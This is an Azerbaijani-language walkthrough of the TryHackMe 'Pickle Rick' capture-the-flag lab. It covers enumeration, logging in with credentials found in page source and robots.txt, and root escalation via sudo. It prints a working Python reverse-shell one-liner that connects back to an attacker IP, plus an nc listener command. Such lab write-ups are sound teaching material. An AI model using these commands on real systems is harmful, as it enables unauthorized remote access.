Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşım müəllifi: Valida Babayeva ( https://medium.com/@validababayeva222 )
Paylaşıma istinad: https://medium.com/@validababayeva222/pickle-rick-ctf-6869bc988fdb

Bu CTF-i TryHackMe-nin AttackBox-unda işləyəcəm, amma öz kali’nizdə də işləyə bilərsiniz.Bunun üçün TryHackMe-nin VPN-ini açmalısınız.Bunu necə edəcəyinizi bilmirsinizsə, ilk yazdığım Lian_Yu CTF-inə nəzər sala bilərsiniz.Orda detallı şəkildə TryHackMe VPN-inin necə açılacağını yazmışam.AttacBox-u çalışdırmaq isə olduqca sadədir.Sadəcə ‘Start Machine’ hisəsini klikləyib (bir dəqiqə ərzində sizə bir İP ünvanı verir) yuxarı hissədə yer alan ‘Start AttackBox’ hissəsini klikləyirsiniz, 2–3 dəqiqə ərzində AttackBox açılacaqdır.
İndi isə CTF-in həllinə keçid alaq:
Ilk öncə enumeration (Enumeration sistem və ya şəbəkə daxilində potensial hədəflərin, zəifliklərin və ya resursların sistematik şəkildə aşkar edilməsi və siyahıya alınması prosesinə aiddir)etməliyik.
nmap tool’undan istifadə edərək açıq portları, bu portlarda çalışan servisləri görməyə çalışaq:

-A (agressiv skan: daha çox xüsusiyyət çıxarır hədəf haqqında)
-T4 (Hədəf haqqında məlumatlarıdaha sürətli əldə etməkçün istifadə edirik)
Görürük ki 22 (ssh) və 80 (http) portu açıqdır.İlk öncə İP-mizi götürüb brauzerə daxil edək və açılan veb sayta, source code-una nəzər salaq, ola bilsin ki, CTF-in həllinə dair dəyərli məlumat tapdıq:

Açılan səhifə bu şəkildə görünür, indi source code-una nəzər salaq:

Burda ‘ Username: R1ckRul3s’ qeyd edildiyini görürük.CTF-in həllinə yönəlik bir məlumat kimi görünür,bir kənara qeyd edək bunu.
Daha sonra gobuster tool-undan istifadə edərək hansı asset-lərə keçid edə bilərik onlara baxaq:
(gobuster-i bu kommand vasitəsilə çalışdırsanız gizlənmiş qovluqları da çıxarır)


Status code-u 200 və 301,302 olanlara daxil ola bilərik.Məsələn /denied.php, /portal.php -nin status code-u 302-dir (bizi başqa bir URL-ə yönləndirəcək).Daxil olaq:

Gördüyünüz kimi bizi /login.php hissəsinə yönləndirdi.Username hissəsinə source code-da gördüyümüz R1ckRul3s yaza bilərik amma password-u bilmirik.Ona görə də enumeration-a davam edək./robots.txt asset’inə daxil olaq.Burda adətən veb saytda hansı assetlərə giriş icazəmiz var, hansılara yoxdur o qeyd edilir.Daxil olaq:

Amma fərqli bir mənzərə ilə qarşılaşırıq.Biz password-u axtarırdıq.Təxmin edirik ki bu hərflər ardıcıllığı bizim şifrəmiz ola bilər.Daxil olmağa çalışaq:

Bu şəkildə ‘Command Panel’ açılır.İndi bir sıra linux kommandlarını yazaq:
ls (listləmək üçün istifadə edirik):

Birinci faylın adı olduqca maraqlı görünür.Faylın içini oxumaq üçün ‘cat’ əmrindən istifadə edək:
cat Sup3rS3cretPickl3Ingred.txt:

cat kommandını çalışdıra bilmirik (sistemdə bu kommandı çalışdırmağa icazə verilmir).Ona görə onun alternativi olan less kommandından istifadə edək:
less Sup3rS3cretPickl3Ingred.txt:

Birinci ingredienti tapdıq.İndi yenidən axtarışa davam edək.ls əmrini çalışdırdığımızda clue.txt faylını görmüşdük.Faylın adı qəribə görünür.Gəlin məzmununa baxaq, yenidən less əmri ilə:

Burda digər ingredienti tapmaq üçün fayl sistemində axtarış etməli olduğumuz qeyd edilir.
Fayl sistemində axtarış edib ikinci ingredienti tapmaq üçün shell almalıyıq.Bunu üçün bu əmrdən istifadə edə bilərsiniz:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
IP hissəsinə AttackBox-unuzun İP ünvanını, port yerinə isə təsadüfi bir port qeyd edin məsələn 4444.Hansı python vasitəsilə çalışdıracağımızı öyrənməkçün ‘Comman Panel’ hissəsinə ‘which python’ əmrini yazırıq (olmasa ‘which python3’ hansında nəticə çıxararsa, o şəkildə çalışdıracıq əmri):

Deməli python3 ilə çalışdıracıq əmri.Terminalda da nc (netcat) tool-undan istifadə edərək təyin etdiyimiz portu (4444) dinləyəcik:
nc -lvp 4444 :

əmri python3 ilə çalışdırdığımızda shell əldə etməliyik:

Və budur shell əldə etdik.İndi sistemdə home kataloquna getməyə çalışaq, çünki istifadəçilər /home kataloqunun altında olurlar.İlk öncə bizim hansı kataloqda olduğumuza baxaq:

/var/www/html kataloqundayıq.Deməli 3 kataloq geriyə gedib /home kataloquna keçid etməliyik:

3 kataloq geriyə gedib home kataloquna keçid etdik, ls -la ((-l icazələri görmək üçün), -a (gizli fayl və ya kataloq varsa onları görmək üçün)) əmrini çalışdırdıqda ubuntu və rick adında istifadəçilərimizin olduğunu görürük.ubuntu adlı istifadəçiyə cd əmri ilə keçid edib ls -la əmrini çalışdıraq:

CTF-in həllinə yönəlik bir məlumatla qarşılaşmırıq.Ona görə ikinci istifadəçimizə keçid edək (rick):

Burda “second ingredients” faylının olduğunu görürük.cat əmrindən istifadə edərək faylın məzmununu oxuyaq, amma burda bir hissəyə diqqət etmək lazımdır. Faylın adını “second ingredients” şəklində dırnaq daxilində yazmaq lazımdır.Çünki faylın adı bir birindən ayrı yazılmış iki sözdən ibarət olduğu üçün “ ” olmadan yazsanız əmr çalışmayacaq:

Ikinci ingredient-i da bununla tapmış olduq.İndi imtiyazlarımızı yüksəldərək üçüncü ingredienti əldə etməliyik.Çünki iki istifadəçimiz var idi: ubuntu adlı istifadəçidə CTF-in həllinə yönəlik məlumat tapa bilmədik, rick adlı istifadəçidə tapdıq, indi isə root istifadəçimiz qaldı yalnız.
İmtiyazlarımızı yüksəltmək üçün yollar axtaraq.İlk öncə sudo -l əmrini çalıdıraq ki, hansı əmrləri root kimi çalışdıra bilirik (root şifrəsi istəmədən) ona nəzər salaq:

və budur görürük ki, bütün əmrləri root kimi çalışdıra bilirik.Ona görə ilk ağlımıza gələn əmri çalışdıraq:
sudo su

root olduqdan sonra pwd əmrini çalışdırıb hansı kataloqda olduğumuza baxdıq: /home/rick
Ona görə iki kataloq geriyə gedib root kataloquna keçid etdik və ls -la əmrini çalışdırqdıq.3rd.txt faylını görürük, cat 3rd.txt əmrindən istifadə edərək faylın məzmununu oxuduq və 3-cü ingredienti də tapmış olduq!!!
Ümid edirəm sizin üçün faydalı olmuşdur 🙂
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat